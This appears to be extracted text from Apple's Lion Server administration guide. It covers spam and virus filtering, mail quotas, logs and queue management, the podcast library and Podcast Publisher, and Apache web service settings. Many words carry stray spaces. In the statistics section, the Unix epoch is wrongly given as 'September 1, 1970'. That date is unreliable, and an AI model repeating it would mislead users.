Mail s ervice us es SpamAssassin to filter spam, or junk mail, from incoming mail messages. Mail s ervice us es ClamAV to detect viruses in mail mes sages. Both tools are managed in the Filters pane of Mail Settings in Server Admin. Enable junk mail screening (Bayesian filters) Before you can benefit from mail s creening, it must be enabled. While enabling screening, you configure screening parameters. Bayesian mail filtering is the class ification of mail mess ages based on statistics. Each mes sage is analyzed and word frequency statis tics are s aved. Mail mess ages that have more of the s ame words as those in junk mail receive a higher marking of probability that they are also junk mail. When the message is screened, the server adds a header (X-Spam-Level) with the junk mail probability score. For example, s uppose you have 400 mail messages where 200 of them are junk and 200 are good mail. When a message arrives, its text is compared to the 200 junk mail and the 200 good mess ages . The filter as signs the incoming message a probability of being junk or good, depending on what group it most resembles . Bayesian filtering has s hown itself to be a very effective method of finding junk mail if the filter has enough data to compare. One strength of this method is the more mail you get and classify (a proces s called training), the more accurate the next round of class ification is. Even if junk mail senders alter their mailings , the filter takes that into account the next time around. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Filters tab. 4. Select Scan Mail for Junk Mail. 5. Set the level of permis siveness (Cautious , Moderate, Aggress ive). The permis siveness meter sets how many junk mail flags can be applied to a message before it is proces sed as junk mail. If you set it to Least permis sive, mildly sus picious mail is tagged and proces sed as junk mail. If you set it to Most permissive, it takes a high score (in other words, many junk mail characteristics) to mark it as junk. 6. Choose from the following to deal with junk mail mess ages:
Choice Description
Bounced
Sends the message back to the sender. You can optionally send a mail notification of the bounce to a mail account, probably the
postmaster.
Deleted
Deletes the message without delivery. You can optionally send a mail notification of the bounce to a mail account, probably the postmaster.
Delivered
Delivers the message even though its probably junk mail. You can optionally add text to the subject line, indicating that the message is probably junk mail, or encapsulate the junk mail as a MIME attachment.
Redirected
Delivers the message to someone other than the intended recipient.
7. Choose how often to update the junk mail database. 8. Click Save. Training the junk mail filter with user help 1. Enable junk mail filtering. 2. Create two local accounts : junkmail and notjunkmail. 3. Use Sever app to enable them to receive mail. 4. Instruct mail users to redirect junk mail mes sages that have not previously been tagged as junk mail to junkmail@<yourdomain>. 5. Instruct mail users to redirect real mail mes sages that were wrongly tagged as junk mail to notjunkmail@<yourdomain>. Each day at 2:15 am, the junk mail filter will learn what is junk and what was mistaken for junk. 6. Delete the mess ages in the junkmail and notjunkmail accounts daily. Training the junk mail filter without user interaction You can also train the junk mail filter by giving it known junk and good mail mes sages. Accurate training requires a large sample, so a minimum of 200 messages of each type is advised. 1. Choose a mailbox of 200 messages made of only junk mail. 2. Use Terminal and the filters command-line training tool to analyze and remember junk mail using the following command: sa-learn --showdots --spam sample junk mail directory/* 3. Choose a mailbox of 200 messages made of only good mail. 4. Use Terminal and the filters command-line training tool to analyze and remember good mail us ing the following command: sa-learn --showdots --ham sample good mail directory/*
If the junk mail filter fails to identify a junk mail mes sage, train it again so it can do better next time. Us e sa-learn again with the -spam argument on the mislabeled message. Likewise, if you get a false pos itive (a good message marked as junk mail), use sa-learn again with the --ham argument to further train the filter. Filtering mail by language and locale You can filter incoming mail based on locales or languages . Mail messages composed in foreign text encodings are often erroneously marked as junk mail. You can configure your mail server to not mark messages from designated originating countries or languages as junk mail. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Filters tab. 4. Select Scan Email for Junk Mail. 5. Click the Edit (/) button next to Accepted Languages to change the list, select the language encodings to allow as non-junk mail, and click OK. 6. Click the Edit (/) button next to Accepted Locales to change the list, select the country codes to allow as non-junk mail, and click OK.
7. Click Save. Enabling Virus Screening Before you can benefit from mail s creening, it must be enabled. While enabling screening, you configure screening parameters. Lion Server us es ClamAV (from www.clamav.net) to scan mail mess ages for viruses . If a suspected virus is found, you can deal with it s everal ways, described below. The virus definitions are kept up to date (if enabled) via the Internet using a process called fres hclam. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Filters tab. 4. Select Scan Email for Viruses. 5. Choose from the following to deal with junk mail mess ages.
Choice Bounced Description Sends the message back to the sender. You can optionally send a mail notification of the bounce to a mail account (probably the domains postmaster) and notify the intended recipient. Deleted Deletes the message without delivery. You can optionally send a mail notification to a mail account, probably the postmaster, as well as the intended recipient. Redirected Delivers the message to a designated address for further analysis.
6. Choose whether to notify the intended recipient if the message was filtered. 7. Choose how often to update the virus database. A minimum of twice a day is suggested. Some administrators choose eight times a day. 8. Click Save.
Mail
Server-side mail rules

Lion Server supports Sieve s cripts to process server-s ide mail rules. For Sieve to function, you must enable its communications port. Sieve is an Internet standard mail filtering language for server-side filtering. Sieve s cripts interact with incoming mail before final delivery. Sieve acts much like rules in mail programs to sort or process mail based on user- defined criteria. Sieve can provide such functions as vacation notifications, message sorting, and mail forwarding. Sieve s cripts are kept for each user on the mail s erver at /Library/Server/Mail/Data/rules /GUID. The directory is owned by Mail service, so users normally dont have access to it and cant put their scripts there for mail processing. For security purposes, users and adminis trators upload their scripts to a Sieve process, managesieve, which transports the scripts to the mail proces s for the user. Place s cripts for all users in the central script repository at /us r/sieve/. By default, Sieve has the vacation extension. To enable Sieve support 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings.
3. Select the Filters tab. 4. Select Enable server side mail rules.
RELATED INFORMATION
Sample Sieve Scripts
Mail
Manage mail quotas

A quota is set for all users in Server app. Mail quotas define how much disk s pace a users mail can use on the mail server. Although you dont set a mail users quota in Server Admin, you do manage quota enforcement and your servers response to quota violation. Mail quotas are especially important if the mail server hos ts many IMAP accounts. IMAP doesnt require mail to be removed from the server when read, s o IMAP users who get large attachments can fill their quotas quickly. Limit incoming message size You can set a maximum size for incoming mes sages. The default is 10 MB. You might not want to allow large attachments that add to the mess age s ize. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Quotas tab. 4. Click the Refuse mes sages larger than checkbox and enter the number of megabytes as the limit. 5. Click Save. Enable mail quotas for users You can enable limits to mail s torage on server. This is especially important if you us e IMAP for incoming messages because mail mess ages arent necess arily deleted when downloaded to the user. 1. In the Mail Server pane of the Server app, select the checkbox labeled "Limit mail to 200 MB per us er." 2. Optionally, change the default 200 MB to your limit. View a user's quota usage When a mail user is over quota, Server Admin (in the Mail> Maintenance > Accounts pane) reports a percent free, which is negative. This percent is proportional to the amount the user is over quota. For example, s uppose a user has a 200 MB quota and has received 205 MB of mail. This is 5 MB over quota, which is 2.5% over quota. Server Admin reports this as -2.5% of quota. Configure quota warnings When a us ers mailbox approaches its storage quota, you can warn users of an impending quota violation. You choose whether to warn the mail user, how often to warn him or her, and at what point to send the warning. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Quotas tab. 4. Click Enable quota warnings. 5. Enter the maximum percentage of storage usage before a warning is s ent. 6. Enter the frequency of the warning notice, in number of days. 7. To customize the quota warning notification, click Edit Quota Warning Message and customize the mes sage. 8. Click Save.
Configure quota violation responses When a mail user has more mail in storage than is allowed for his or her quota, the mail s erver recognizes a quota violation. There are typically two responses to quota violation: a violation notice, and suspension of mail service. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Quotas tab. 4. Click Enable Quota Warnings . 5. To customize the quota violation notification, click Edit Quota Warning Message, then cus tomize the message. 6. To s uspend mail s ervice for us ers who exceed their quotas, s elect Disable a users incoming mail when they exceed 100% of quota. 7. To customize the over-quota mess age, click Edit Over Quota Error Message and then customize the mes sage. 8. Click Save.
Mail
Configure mail client applications

Users must configure their mail client software to connect to Mail service. The following table details the information mos t mail clients need and the source of the information in Lion Server.
Mail client softw are User name Account name or Account ID Password Host name, Mail server, Mail host Lion Serv er Full name of the user Short name of user account Password of user account Mail servers full DNS name or IP address, as used when you log in to the server in Server Admin Mail address Users short name, followed by the @ symbol, followed by one of the following: Servers Internet domain (if the mail server has an MX record in DNS) Mail servers full DNS name Servers IP address in brackets SMTP host, SMT P server POP host, POP server IMAP host, IMAP server SMTP user SMTP password Same as host name Same as host name Same as host name Short name of user account Password of user account mail.example.com, 192.168.50.1 mail.example.com, 192.168.50.1 mail.example.com, 192.168.50.1 vivian vivian@example.com, vivian@mail.example.com, vivian@[192.168.50.1] mail.example.com, 192.168.50.1 Examples Vivian Li vivian
Mail
Set up mail server clustering with Xsan

With Xs an, you can clus ter multple mail servers that share the mail s tore. This provides mission-critical redundancy and high performance and allows you to easily maintain the pooled s torage using Xsan tools and software. Each server also has a primary SMTP spool file. If a server goes offline, another node in the cluster takes over processing of the failed s evers spool file. This happens automatically, but you see it noted in log files.
You can configure your mail server to join an exis ting mail cluster as a new member of the cluster, or you can migrate a mail servers mail s tore to another server that is a member of the cluster. If Xsan software is ins talled, you can als o create a cluster, with the current server becoming the clusters first member.
1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Advanced. 3. Click Clustering. 4. Click the Change button, then follow the ons creen instructions that appear. After a s erver has joined a cluster, changes to mail server settings, such as SMTP, POP, IMAP, and logging, affect all servers in the cluster. When you remove the las t member of a cluster, you must des ignate a server to take over as a standard mail server.
Mail
Monitor Mail serv ice
Set Mail service logging options

Mail s ervice log settings are customizable. Mail s ervice logs can show the following levels of reported detail:
Lev el
Description
Debug Information Notice Critical Warning Errors
All debugging information Connection transactions, delivery attempts, authentication attempts Authentication failures Errors that require prompt administration attention All warnings and errors All errors
You can choos e log detail for each s ervice category (outgoing, incoming, or junk mail filter). Set the Mail service log detail 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Settings. 3. Select the Logging tab. 4. Select the service whose log detail you want to set:
Serv ice Description
SMTP POP/IMAP Junk Mail/Virus
Outgoing mail and connections from external mail servers Incoming mail retrieval for users The junk Mail service
5. From the Log Detail Level pop-up menu, choos e a detail level. 6. Click Save. Archiving Mail service logs by schedule
Lion Server archives Mail service logs after a specified time. Each archive log is compressed and us es less disk s pace than the original log file. You can customize the s chedule to archive the logs after a s et period of time, meas ured in days. 1. In Server Admin, select Mail in the Computer & Services lis t. 2. Click Settings. 3. Select the Logging tab. 4. Click Archive Logs Every ____ Days. 5. Enter the number of days. 6. Click Save.
Mail
View Mail service settings from the command line

Use the serveradmin command to view mail service settings from the command line. To view Mail service configuration settings $ sudo serveradmin settings mail
To view a specific setting $ sudo serveradmin settings mail:setting
To view a group of settings You can view a group of s ettings that have part of their names in common by entering as much of the name as you want, stopping at a colon (:), and entering an asterisk (*) as a wildcard for the remaining parts of the name. Example: $ sudo serveradmin settings mail:imap:*
Mail
View an overview of Mail service activity

You can obtain an overview of Mail s ervice that reports whether the service is running, when Mail s ervice started, and incoming and outgoing connections by protocol. To see an overview of Mail service activity 1. In Server Admin, select Mail in the Computer & Services lis t. 2. Click the Overview button. To see a summary status of Mail service from the command line $ sudo serveradmin status mail
To see a detailed status of Mail service from the command line $ sudo serveradmin fullstatus mail
Mail
View Mail service logs

Viewing Mail service logs and reclaiming space us ed by logs. Mail s ervice maintains the following logs:
Log Mail Access IMAP Log POP Log SMTP Log Mailing List Logs Description General Mail service information is stored in this log. IMAP activity is stored in this log. POP activity is stored in this log. SMTP activity is stored in this log. T hese record Mailman activity, including service, error, delivery, delivery failures, postings, and subscriptions. Junk Mail and Virus Logs T hese record activity for mail filtering, including virus definition updates (freshclam log), virus scanning (clamav log), and mail filtering (amavis log).
To view a Mail service log 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click the Logs button. 3. From the View pop-up menu, choose a log type. 4. Click Save. From the command line You can us e tail or another file-listing tool to view the contents of Mail service logs. 1. Use the serveradmin getLogPaths command to see where Mail s ervice logs are located: $ sudo serveradmin command mail:command = getLogPaths 2. View the latest entries in your s elected log with the tail command. a. To view the las t 10 entries in the Junk Mail/Virus Scanning log: $ tail /var/log/amavis.log b. To view any number of entries: $ tail -n lines /var/log/amavis.log Replace lines with the number of lines you want to view. c. To watch new additions to the log file: $ tail -f /var/log/amavis.log Control-C s tops the tail command from watching the log file and returns your command prompt. Reclaim disk space used by Mail service log archives Lion Server reclaims disk s pace used by Mail s ervice logs when they reach a specified s ize or age. You can use the diskspacemonitor command-line tool to monitor disk space when you want, and delete or move the log archives. For additional information, see the diskspacemonitor man page. To search for specific entries , us e the text filter box in the window.
Mail
View the Mail connections list

Server Admin can list the users who are connected to Mail s ervice. For each user, you see the user name, IP address of the client computer, type of mail account (IMAP or POP), number of connections, and connection length.
1. In Server Admin, select Mail in the Computer & Services lis t. 2. Click the Connections button.
Mail
View Mail accounts

You can us e Server Admin to s ee a lis t of users who have used their mail accounts at leas t once. For each account, you see the user name, disk s pace quota, disk space used, and percentage of space available to the us er. Mail accounts that have never been us ed arent listed.
1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Maintenance. 3. Click the Accounts button.
Mail
Monitor the outgoing mail queue

You might need to check mail that is waiting to be sent. If you have a message backlog, or if you have interrupted outbound mail, you might have a number of items in the queue. Additionally, you might want to monitor mail delivery to ens ure that mail is being delivered to local and remote hosts. Check the outgoing mail queue 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Maintenance. 3. Click the Mail Queue tab. 4. To ins pect a mess age, select it. Clear messages from the outgoing mail queue Your outgoing mail queue might have a backlog of messages. These are mess ages that cant be s ent for any number of reasons: the message might be improperly addres sed, the des tination s erver might be unresponsive, or the destination account might be over quota. In such circumstances , you might want to clear mess ages from the queue backlog. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Maintenance. 3. Click the Mail Queue tab. 4. Select the mes sage to delete. 5. Click Delete. Retry sending undelivered outgoing messages Sometimes the outgoing mail queue has undelivered messages that are properly addressed, but for s ome reason the messages arent s ent (for example, if the destination s erver is down, or if the firewall is blocking the outgoing port for SMTP). You can attempt to send the mess ages again. Normally, the mail s erver attempts to resend, but you can activate it manually instead of waiting. 1. In Server Admin, select a computer in the Servers list, then s elect Mail. 2. Click Maintenance. 3. Click the Mail Queue tab.
4. Select the mes sage to retry sending. To s elect more than one mes sage, hold down the Shift or Command keys. 5. Click Retry. While doing this you can monitor the logs to see what might be caus ing the problem.
RELATED INFORMATION
View Mail s ervice logs
Mail
View Mail service statistics

You can us e the serveradmin getHistory command to display a log of periodic samples of the number of user connections and the data throughput. Samples are taken once each minute.
1. In Terminal, enter the following: $ sudo serveradmin command The serveradmin command prompt appears. 2. Enter the following in the serveradmin command prompt: mail:command = getHistory mail:variant = statistic mail:timeScale = scale Replace statistic and scale with the following:
Parameter statistic Description The value you want to display. Valid values include:
v1 - Number of connected users (average during sampling period) v2 - Data throughput (bytes/sec)
scale The length of time in seconds, ending with the current time you want to see samples for. For example, to see 24 hours of data, you would specify mail:timeScale
= 86400.
3. Press Control-D to s ave and exit the serveradmin command prompt.
The computer responds with the following output: mail:nbSamples = <samples> mail:v2Legend = "throughput" mail:samplesArray:_array_index:0:vn = <sample> mail:samplesArray:_array_index:0:t = <time> mail:samplesArray:_array_index:1:vn = <sample> mail:samplesArray:_array_index:1:t = <time> [...] mail:samplesArray:_array_index:i:vn = <sample> mail:samplesArray:_array_index:i:t = <time> mail:v1Legend = "connections" afp:currentServerTime = <servertime>
Parameter Description
<samples> <sample>
T he total number of samples listed. T he numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second.
<time>
T he time when the sample was measured. A standard UNIX time (number of seconds since September 1, 1970). Samples are taken every 60 seconds.
Mail
Solv e Mail serv ice problems
Improve performance
Mail s ervice must act very fas t for a s hort period of time. It sits idle until a user reads or sends a message, then it transfers the mess age immediately. Therefore, it puts intense but brief demands on the server. As long as other s ervices do not place heavy continuous demands on a server (for example, as a QuickTime s treaming server would), the mail server can typically handle several hundred connected us ers. As the number of connected mail us ers increases, the demand of Mail s ervice on the s erver increases. If Mail service performance needs improvement, try the following: Move the mail storage location to its own hard disk or hard disk partition. Run other services on a different s erver, especially s ervices that place frequent heavy demands on the server.
Mail
If mail is undeliverable
Mail mes sages might be undeliverable for several reasons. Incoming mail might be undeliverable becaus e it has a misspelled address or is addressed to a deleted user account. Outgoing mail might be undeliverable because its misaddress ed or the des tination mail s erver is nt working. You can configure Mail service to: Forward undeliverable incoming mail. Mail service can forward messages that arrive for unknown local users to another local person or a group in your organization. Whoever receives forwarded mail thats incorrectly addressed (with a typo in the addres s, for example) can forward it to the correct recipient. If forwarding of thes e undeliverable messages isnt explicitly enabled, the messages are returned to sender. Limit the number of attempts to deliver problematic outgoing mail. Report failed delivery attempts. Use a different timeout value to increase the chance of connection succes s.
Mail
Configure additional Mail service support for 8-bit MIME

To receive 8-bit character-encoded mail messages, disable the default convers ion that Postfix performs. Use the postconf command-line tool to disable the setting. By default, many mail sys tems that us e 8-bit character encoding for text (like Asian language mail s ys tems ) convert from 8-bit MIME to 7-bit characters . This has the unfortunate effect of garbling the mail.
1. Log in to your s erver as the administrator. 2. In Terminal, enter the following command: sudo postconf -e disable_mime_output_conversion=yes.
This disables the special process ing of Content-Type headers while delivering mail.
Podcast
About the Lion Server podcast libary

Lion Server introduces a new podcast library that integrates with Wiki Server 3. With Mac OS X Lion, podcasting is even easier. Us e the new Podcas t Publisher application to develop the content for your podcas ts . (Podcast Publisher is included with Mac OS X Lion and can be found in the Utilities folder of Launchpad.) You then upload them to the Lion Server podcast library. The podcast library is integrated with Wiki Server 3, giving your users a consistent experience across wiki pages and podcasts. It also makes your management of the podcas t library easier than ever for you. The Lion Server podcas t library: Gives users a clean, consistent, page where they can discover new and interes ting podcasts. Allows you to as sign content control to other administrators, allowing them to eas ily remove outdated or otherwise irrelevant content. Provides a s imple mechanis m for you to limit who can s ee episodes on a particular feed us ing the same us ers and groups that Wiki Server 3 uses. Note: If you have an existing Podcas t Producer infrastructure, you can continue to use that with Lion Server. As well as having access to Podcas t Composer and Podcast Capture as before, you can also s end content generated in Podcast Publisher directly to a Podcast Producer workflow.
Podcast
Set up a podcast library

To set up a podcast library, download and install the s erver components of Mac OS X Lion. You can set up a podcast library to provide a common location for publis hing podcas ts . You can s hare podcas t epis odes to the podcas t library from the Podcast Publisher application in Mac OS X Lion or from podcast workflows you s et up using Podcast Composer in earlier versions of Mac OS X Server.
1. Open the Server app and select the Podcast service on the left, under Services. If you have more than one s erver, s elect Podcast for the server that will hos t the podcas t library. 2. Use the "Podcas t library is viewable by" pop-up menu to choose who can access the library: Anyone: Allows all users to view podcast epis odes in the library. Authenticated Users : Allows only users in the server's user lis t to view episodes . Podcas t Owners : Allows only users in the Administrators lis t to view library content. 3. Optionally, add users to the Administrators lis t. Click the Add button (+) below the list, then choose a user from the lis t that appears. Podcast library administrators can delete other people's podcas ts from the podcast library. 4. Click the On/Off button at the top of the pane to enable the library. Users can share their podcasts with a podcast library from Podcas t Publisher by specifying the addres s of the podcast library server in Podcast Publisher Preferences and then choosing Podcast Library from the Share menu.
Podcast
Use Podcast Publisher
About Podcast Publisher

The new Podcast Publisher application in Mac OS X Lion makes it eas y to create and publish podcas ts . Use Podcast Publis her to record video of you, your computer display, or a narrated screen recording and organize these recordings into unique podcas ts . You can als o import audio and video you have on your computer. Then share the podcasts to
iTunes on your computer, dis tribute them via email, save them to your des ktop, or publish them to a Podcast Library where others can s ubs cribe to and view them using iTunes. If you already use a Podcast Library hos ted by the Podcas t Producer service in Mac OS X Server v10.6 or later, you can publish there too.
RELATED INFORMATION
Create a podcast Set up a podcas t library
Podcast
Understand podcasts and episodes

A Podcast allows you to group audio files, video files , PDFs, and ePub documents about a topic or along a theme and share that content from a single Internet address . Other people can go to the same Internet address and s ee new information you add to your podcas t. These episodes in your podcast are unique, so you can mix audio and video files and PDF and ePub documents in a single podcas t. You can create as many different podcasts as you like and as many episodes as you want in each podcas t.
Podcast
How people see your podcasts

After you create a podcast, you share it so others can view content you add to the podcas t. A podcas t has an address on the Internet that people can connect or s ubs cribe to. People subs cribe to a published podcast with a program like iTunes . When you publis h episodes to your podcast, they are added to a subscriber's iTunes library. For this to happen, someone mus t host the podcast. Lion Server includes a way for you to easily host your own podcas ts . This is called the Podcast service or the Podcast Library. Podcast Publisher sends your podcasts to the Podcast Library in Lion Server. If your organization is using Podcas t Producer, you can als o send your podcas ts to it. To look at or share a specific episode before sending it to the Podcast Library, you can also share it through email, save it to your computer, or open it in iTunes on your computer.
Podcast
Create a podcast
1. Open Podcast Publisher (in Applications/Utilities) and click New Podcast in the lower-left corner of the window. If you're opening Podcast Publisher for the first time, there's a new podcast ready for you. 2. Enter a podcas t title, then click the "(+) Add a new episode" note. This title is for the entire podcast series. Each episode in the podcast has its own title, which you can set later. 3. Add content by recording from a camera attached to your computer or from audio or movie files you have. For more information, see Record content for an epis ode and Add existing content to a podcas t. 4. Add episode information that your podcast s ubscribers can see in iTunes (or other applications they us e to view your podcast). For more information, see Add information about your podcasts. 5. Preview the episode. Click the Play (right-facing triangle) button in the timeline below the podcas t episode. 6. Share the episode. Choose how to s hare the episode from the Share menu, or click the Share button. For information, see Publish a podcast.
RELATED INFORMATION
Record content for an episode Add existing content to a podcast Publish a podcast
Podcast
Record content for an episode

You can record video content for an epis ode from your computer screen, or from the built-in (or attached) camera on your computer. You can also record audio content.
1. Select a podcast. If you have more than one podcast, use the Right Arrow and Left Arrow keys to navigate between them. If you're in the recording s creen for an episode, click All Podcasts to return to the epis ode preview pane. 2. Add content us ing one of the following: Record video from camera: Click the New Video Episode button below the epis ode preview pane. When the recording pane appears, move the toggle at the lower left to the left to select the film strip icon. When you're ready, click the record button and click it again when you finis h recording. Record your computer screen: Click the New Video Epis ode button below the episode preview pane. When the recording pane appears, move the toggle at the lower left to the right to select the s creen icon. Us e the record button to start and stop recording. Speak as you record your actions to provide narration. The Podcast Publisher window does not appear in the recording. You can minimize it to get it out of the way or leave it open during recording. Record audio: Click the New Audio Epis ode button below the episode preview pane. Use the record button to start and stop recording. If the wrong New Audio Episode or New Video Epis ode button appears , click the arrow at the right of the button that is showing and s elect the action you want.
Podcast
Add existing content to a podcast

You mus t have a valid media type to import into a podcast. Valid media types include:
Content Audio File type MP3 MPEG4 AIFF Video Quicktime Movie MPEG4 MPEG 3GPP Document PDF ePub
If you have an audio or video file that must be converted to a valid media type, try using Quicktime Player. The Pages app (available on the Mac App Store) lets you save documents as PDFs or ePub files. You can us e audio and video files and s ome documents that you have on your computer to make podcasts.
1. From the File menu, s elect Import Media. 2. Navigate to your content and select Import.
Podcast
Add information about your podcasts

Add s upporting information to podcast epis odes You can modify the title and add comments , an author, dates, and related information to any episode in your podcas t.
1. If you haven't already, open the episode in the editing pane of Podcas t Publisher. If you just opened Podcas t Publisher, navigate to the podcast and the episode. If you're in the recording screen for the epis ode, click Cancel to return to the episode view. 2. Click on an item in the episode view. 3. Click the Info button at the top left. 4. Enter a title, the author's name, and text to describe the basic information about the episode. You can enter more information and find out the URL to that episode by clicking the Show Advanced button. 5. When you finish annotating, click the Info button again, or click outside of the Info panel to dis miss it. Viewers can see the information you provide by clicking the Info button in iTunes when they watch the episode.
Podcast
Publish a podcast
To share a finished podcast episode, you can open the episode in iTunes on the computer where it was created, email the episode to others, put a copy of the epis ode on your des ktop, or publis h the episode to a Podcast Library.
1. In Podcast Publisher, select the epis ode to share. The Share button appears at the right, below the episode preview. If you don't see the Share button, try again to s elect the epis ode or, if you're in the recording pane, click Cancel. 2. Click the Share menu or the Share button and choos e how to share the epis ode. iTunes: Adds the episode to the iTunes library. Audio and video files are added to Music and Movies , PDF and ePubs documents are added to Books. Mail: Creates an email mes sage with the episode as an attachment. Recipients of your email can use iTunes to view your podcas t epis ode. Podcas t Library: Publishes the episode in the Podcast Library on the server you choose. A confirmation message appears when the episode is published. A button in the mess age lets you announce the episode in email. Anyone with acces s to the library can view the episode, and it appears in iTunes for users who s ubscribe to the podcast.
RELATED INFORMATION
Set up a podcas t library
Podcast
Work w ith legacy podcast tools
Use Podcast Capture

Podcast Capture is a part of the Podcas t Producer solution. Use Podcas t Capture to capture and upload audio and video QuickTime movies to a Podcast Producer s erver for encoding and publishing. You can also use Podcast Capture to upload files for processing and publishing as a single podcast. Set up Podcast Capture Set up podcas t capture for the first time
Bind a Mac to a Podcas t Producer server Configure general Podcast Capture preferences Configure audio/visual Podcas t Capture preferences Use Podcast Capture Log in Record and upload audio from a s ingle source Record and upload video from a single source Record and upload video from dual sources Record and upload a screen recording Monitor transfers Upload files Browse epis odes Log out About workflows
Podcast
Work w ith legacy podcast tools
Use Podcast Composer

Podcast Composer simplifies and s peeds up the process of building workflows by providing a simple graphical user interface. You provide information about the workflow, without writing XML code or worrying about where to store resources and credentials. The Import stage Select the input source of the content your workflow processes. Configure Single Source Configure Dual Source Configure Montage The Edit stage Brand your podcast with titles and opening and closing movies. Add and configure an introduction movie Add a title movie Add a watermark and an introduction overlay Add and configure an exit movie Configure transitions Preview the podcast The Export stage Select output formats for your podcast. Add QuickTime encoding formats Add compress or formats The Publish stage Configure destinations for your podcast. Send content to the Podcast Producer Library Send content to an Apple wiki server
Send content us ing file trans fer protocols Send content to the Watch folder of Final Cut Server Send content to a shared folder Send content to a workflow The Notify stage Use different technologies to notify others about your podcast. Add email notifications Add iChat notifications Add iTunes podcast directory notifications Add iTunes U notifications Add third-party s ervice notifications
Web
Ov erv iew
About web service

Use the Web pane of the Server app to host websites on your computer. Use web s ervice to publish custom websites that you have created (or someone has created for you) using website development software. You can res trict access to each webs ite to a specific group or restrict parts of the website to s pecific groups. You can also specify each webs ites IP addres s, an access port, and the folder where webs ite files are stored on the s erver. A custom webs ite is also called a virtual hos t. If you want to allow Internet access to your websites and you have a cable router, DSL router, or other network router, your router must have port forwarding (port mapping) configured for web services. If your local network has a separate firewall device, ask the firewall administrator to open the firewall for the ports that web services us e. If you add cus tom websites that use access port numbers other than 80, configure port forwarding for those ports as well. Web service shares Apache server with other s ervices s uch as wiki and Profile Manager service. For information about cus tomizing Apache s ettings , enter man webapp.plist in Terminal.
RELATED TOPIC
Publish a website
Web
Ov erv iew
About web technologies

Web service is based on Apache, an open source HTTP web server. In addition to the s tandard plugin modules distributed with Apache, Mac OS X Lion provides an expanded set of modules, which support PHP, Python, and directory-based authentication, including Kerberos. Web applications, s uch as the Roundcube mail client, use the Pos tgreSQL database management s ystem. In the Server app, you can configure web service to host cus tom websites. For information about customizing Apache settings, enter man webapp.plist in Terminal.
Web
Ov erv iew
About PostgreSQL
Pos tgreSQL provides a relational database management solution for your web server. With this open source s oftware, you can link data in different tables or databases and provide the information on your website.
Wiki and Device Manager s ervices require a PostgreSQL server, so it starts when either of these services are turned on. For information about PostgreSQL, view its documentation at http://www.example.com /postgresql/ (replace www.example.com with your servers URL). For PostgreSQL documentation, s ee www.postgresql.org/docs /.
Web
Work w ith w eb serv ice
Start or stop web service

Because many services rely on Apache, turning off web service does n't stop Apache. Turning on web service does the following: If Apache isn't turned on, it turns on Apache. It enables acces s through the default virtual host to content in the default document root, which is located at /Library/Server/Web/Data/Sites /Default/. It enables acces s to any custom s ites added in the Server app. You can us e the Server app or the command line to start or stop web s ervice. If you need to customize your web server settings , you can edit Apache configuration files and start web s ervice from the command line. Start web service in the Server app Use the Server app to s tart web service. 1. In the Server app, click Web. If web s ervice has never been turned on before, click Enable Service. If web s ervice was previous ly turned on, the Enable Service dialog doesnt appear. 2. Choose On from the pop-up menu under the service name in the Web pane. Start web service from the command line You s hould start web service by using the serveradmin command or by using the Server app, instead of using the apachectl command. The apachectl command acts like a master s witch. If you turn off apachectl, you turn off Podcast, device manager, wiki, and web services. If you use the Server app or the serveradmin command, you can separately turn on and off s ervices . The servermgr_web plugin manages web service s tate for the serveradmin command. For information about servermgr_web, enter man servermgr_web in Terminal. Enter the following command in Terminal: serveradmin start web
Stop web service in the Server app Use the Server app to s top web service. 1. In the Server app, click Web. If web s ervice is already turned off, an Enable Service dialog appears . 2. Choose Off in the pop-up menu under the service name. Stop web service from the command line You can stop web service from the command line. Enter the following command in Terminal:
serveradmin stop web
Web
View web service logs

Web service uses the s tandard Apache log format, s o you can view them us ing Cons ole, command-line tools, or third-party log analysis tools. Apache logs are located in /var/log/apache2/, which is mirrored to /Library/Logs/WebServer/. You can also view /Library/Logs /WebConfig.log. The PostgreSQL log is /Library/Logs /PostgreSQL.log. View web service logs in Console You can us e Console to view Apache log mess ages . 1. Open Cons ole (located in Launchpad, in the Utilities folder). 2. Under Files, navigate to the logs to view and click the logs to view them. For example, to view the Apache error log, click the disclos ure triangle for /private/var/log, click the disclos ure triangle for apache2, and then click error_log. View web service logs from the command line You can view web service logs using the command line. To view the latest entries in a log, enter: $ tail log-file Replace log-file with the path of the log file.
Web
Tune web service performance

The default web service performance settings are tuned to recommended values. You can customize performance settings such as the maximum number of client connections and how long to s tay connecteded before timing out. To tune website performance, you can edit /etc/apache2/httpd.conf. This Apache configuration file includes key performance tuning settings such as:
Setting MaxClients 1024 Description Enter the maximum number of simultaneous connections. T he range is 1 to 1024 connections. You can use a percentage of the maximum number of processes available instead of a hard value by following the value with a "%" character. For example: MaxClients 50% ServerLimit 1024 Enter the upper limit for the MaxClients setting. T his is typically set to the same value as MaxClients. You can use a percentage of the maximum number of processes available instead of a hard value by following the value with a "%" character. For example: ServerLimit 50% Timeout 300 Enter the length of time before a connection to your web server times
out. T imeouts occur when a user is viewing web pages but not interacting with the site. MinSpareServers 1 MaxSpareServers 10 Enter the minimum and maximum number of spare server processes. T hese settings regulate the creation of idle spare server processes. Keep in mind the following: For minimum spare servers processes, if there are fewer than the required minimum spare servers processes, the server adds spare servers processes at a rate of one per second. For maximum spare servers processes, if more than the maximum number of spare servers processes are idle, the server stops adding spare servers processes beyond the maximum limit.
StartServers 1 MaxKeepAliveRequests 100
Enter the number of spare servers that get created at startup. Enter the maximum number of persistent connections to the server. The range is 1 to 2,048 connections.
KeepAliveTimeout 15
Enter the amount of time that can pass between requests before the session is disconnected by the web server. The range for connection timeout is 0 to 9,999 seconds
